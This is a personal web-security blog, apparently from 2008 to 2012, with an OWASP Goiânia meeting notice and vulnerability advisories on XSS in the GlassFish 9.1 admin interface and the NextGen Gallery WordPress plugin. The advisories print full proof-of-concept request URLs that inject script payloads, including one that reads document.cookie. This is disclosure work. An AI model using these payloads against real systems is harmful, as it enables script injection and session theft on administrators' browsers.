Encontro OWASP Goiania

June 19, 2012 Leave a comment

Bom senhores resolvi voltar com esse blog depois de quase 4 anos abandonado.

Gostaria de convidar todos para o encontro do capitulo goiânia que vai acontecer no dia 22 de junho na fasam

 

Pessoal,

Teremos um encontro do capitulo goiania na FASAM, segue o informativo!

Owasp – Encontro Capítulo Goiânia na Faculdade Sul-Americana na noite
do dia 22 de junho às 19:00.

1 – O que é a OWASP e o que o Capítulo Goiânia pretende?

Essa palestra tem como objetivo definir o que é a organização, como
ela funciona e o que ela propõe, também será apresentado uma ideia de
trabalho para o capítulo Goiânia, aonde serão discuta algumas
sistematicas para possiveis encontros periódicos.

2 – OpenSAMM

OpenSAMM é um framework aberto para ajudar as organizações a formular
e implementar uma estratégia para a segurança de software que é
adaptado para os riscos específicos enfrentados pela organização.

Os recursos fornecidos pelo SAMM ajudará em:
* Avaliação das práticas de segurança da empresa de software existentes
* Demonstrando melhorias concretas para um programa de garantia de segurança
* Definir e medir atividades relacionadas com segurança em toda a organização

Categories: Eventos, websecurity Tags: , , ,

[OFF] Debconf8

August 15, 2008 Leave a comment

Now i`m in debconf mar del plata argentina!!

Categories: 1

Multiple XSS in glassfish

June 14, 2008 2 comments

Multiple XSS was found in glassfish web interface, this problems is caused because a input data validation is not occured. Sun where are input data validation?? Where are the tests??? where the security tests???

The good pratice of code propose that all input data are validate to ensure that codes not expected to be inserted in applications. Developers please validate all input data!!!!

==============================

Muitiple XSS – Glassfish Web Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 14 june 2008
Site: http://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Descrition:

This vulnerability affect some webpages in the glassfish webadmin interface,
that vulnerability allow user can insert a malicious or a not expected input
data in the input type field.That was found in 10+ input data field in glassfish.

This is a vulnerable URL:

http://%5BHOSTNAME%5D:4848/resourceNode/customResourceNew.jsf?propertyForm%3Aproper

tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage
%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealer
t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproperty
Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27x
ss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3A
propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%2
7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%
3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%
3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSecti
onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresou
rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_
id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnewButton

http://%5BHOSTNAME%5D:4848/resourceNode/externalResourceNew.jsf?propertyForm%3Aprope

rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPag
e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Eale
rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert
ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%
27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet
%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3
C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectio
nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage%
3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&j
avax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElem
entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://%5BHOSTNAME%5D:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3Apropert

yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aprop
ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fs
cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Anam
e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyShee
t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm
%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%2
8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3
Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&p
ropertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm
_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_
focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://%5BHOSTNAME%5D:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3Aproperty

ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Agener
alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscrip
t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType
=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralProperty
Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&proper
tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true&
propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&p
ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&prope
rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propert
yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyFo
rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&property
Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyFo
rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTab
le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3
A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Ac
ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=pro
pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_Focu
sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%

http://%5BHOSTNAME%5D:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyC

ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aproper
tSectionTextField%3AjndiProp%3Ajnditext=<script>alert(‘xss’);</script>&propertyF
orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFl
owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=
<script>alert(‘xss3′);</script>&propertyForm%3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_i
d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte
ntPage%3AtopButtons%3AnewButton

http://%5BHOSTNAME%5D:4848/applications/lifecycleModulesNew.jsf?propertyForm%3Aprope

rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=<scri
pt>alert(‘xss’);</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3Ap
ropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert(‘xss2′);</scrip
t>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%
3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertySheet%3Apro
pertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert(‘xss3′);</script>
&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3A
descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSec
tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPa
ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_i
d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte
ntPage%3AbottomButtons%3AsaveButton2

http://%5BHOSTNAME%5D:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3Apr

opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyConten
tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>alert(‘xs
s’)</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropert
ySheet%3AresTypeProp%3AresType=<script>alert(‘xss2′);</script>&propertyForm%3Apr
opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<script>a
lert(‘xss3′);</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&proper
tyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_w
ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopBu
ttons%3AnextButton

Categories: websecurity

XSS – Glassfish Web Admin Interface (Sun Java System Application

June 11, 2008 3 comments

Bom senhores, essa e mais uma dentro de uma interface de adminsitracao. mais um problema de validacao de entradas :)

Abracos! :)

==============================

XSS – Glassfish Web Admin Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 10 june 2008
Site: http://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Descrition:

This vulnerability was found in Edit HTTP Listener section in
Glassfish web admin interface.

This is a vulnerable URL:

http://%5BHOSTNAME%5D:4848/configuration/httpListenerEdit.jsf?name=<script>a

lert(document.cookie);</script>&configName=server-config

Categories: websecurity

XSS – Nextgen gallery 0.96 wordpress plugin

June 8, 2008 8 comments

Bom, esse post e dedicado a esse XSS que encontrei no modoulo nextgen do wordpress, sua amplitude nao e tao grande devido a ser um XSS dentro do modulo de admin, porem so reforca que a checagem de todas as entradas e extremamente necessaria! :)

==============================

XSS – Nextgen gallery 0.96 wordpress plugin

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 07 june 2008
Site: webappsecurity.wordpress.com

—————————————

APPLICATION : Nextgen gallery 
VERSION : <= 0.96
VENDOR : http://wordpress.org/extend/plugins/nextgen-gallery/
DOWNLOAD : http://wordpress.org/extend/plugins/nextgen-gallery/

—————————————

IMPACT: XSS, XSRF, etc….

—————————————

Description:

This vulnerability can be explored writing in the descritption textbox a mailicous (or not) code

link: http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery&mode=edit&gid=[galleryID]&_wpnonce=0b3c0996ed

In the description textbox write the text:

<script>alert(‘xss’);</script>

And when the gallery was posted, user click in photo and the script was executed!

Some pictures:

 

 

Categories: websecurity

Reflected XSS

May 27, 2008 1 comment

Esse e’ mais um video usando o webgoat pra mostrar como fazer alguns ataques, todos os videos que estou fazendo serao mostrados no FGSL agora no dia 31 de maio na faculdade senac :)

Bom ainda estao sem narracao mas a ideia e que venham a ter :)

 

Abracos e ate’ algum post descente :)

Categories: videos, websecurity Tags:

Meu primeiro post no meu novo blog :)

May 25, 2008 4 comments

Bom pessoas estou novamente tentando fazer um blog, agora algo mais especifico sobre seguranca em aplicacao web :)

Bom pro meu primeiro post vai um teste de alguns videos que estou fazendo sobre ataques em aplicacoes web :)

Abracos!

ps: Desculpem ainda nao configurei meu teclado novo :)

Follow

Get every new post delivered to your Inbox.